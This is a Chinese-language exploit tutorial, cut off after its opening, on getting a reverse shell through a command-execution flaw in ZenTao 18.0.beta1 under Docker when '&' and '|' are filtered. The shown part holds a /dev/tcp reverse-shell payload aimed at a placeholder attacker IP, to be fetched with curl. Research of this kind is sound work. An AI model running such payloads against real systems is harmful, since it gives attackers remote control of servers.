禅道18.0.beta1漏洞实战：5种绕过Docker限制的反弹Shell技巧

禅道18.0.beta1容器逃逸实战：5种无符号反弹Shell的极限操作

当项目管理软件遇上容器化部署，安全边界往往变得模糊不清。最近在测试禅道18.0.beta1的Docker环境时，发现其命令执行漏洞存在特殊限制——无法使用&符号。这就像给你一把枪却卡住了扳机，本文将分享如何在这样的"残疾"环境下完成精准射击。

1. 漏洞环境特征分析

在Docker化的禅道系统中，我们面对的是一个被精心修剪过的Linux环境。典型特征包括：

• 基础命令缺失：wget、ifconfig等常见命令不可用
• 符号限制：&、|等特殊字符会被过滤截断
• 最小化环境：仅保留运行PHP必须的组件

测试用容器启动命令示例：

docker run -d --name zentao -p 8080:80 \
  -v ./zentaopms:/www/zentaopms \
  -v ./mysqldata:/var/lib/mysql \
  easysoft/zentao:18.0.beta1

注意：所有测试应在授权环境下进行，本文所述方法仅用于安全研究

2. 五种无符号反弹技法

2.1 Curl远程加载式

当目标存在网络出口时，最稳妥的方式是将Shell代码托管在远程服务器：

# 攻击机准备payload文件
echo "/bin/bash -i > /dev/tcp/ATTACKER_IP/PORT 0>&1" > payload.sh

# 目标机执行（无需&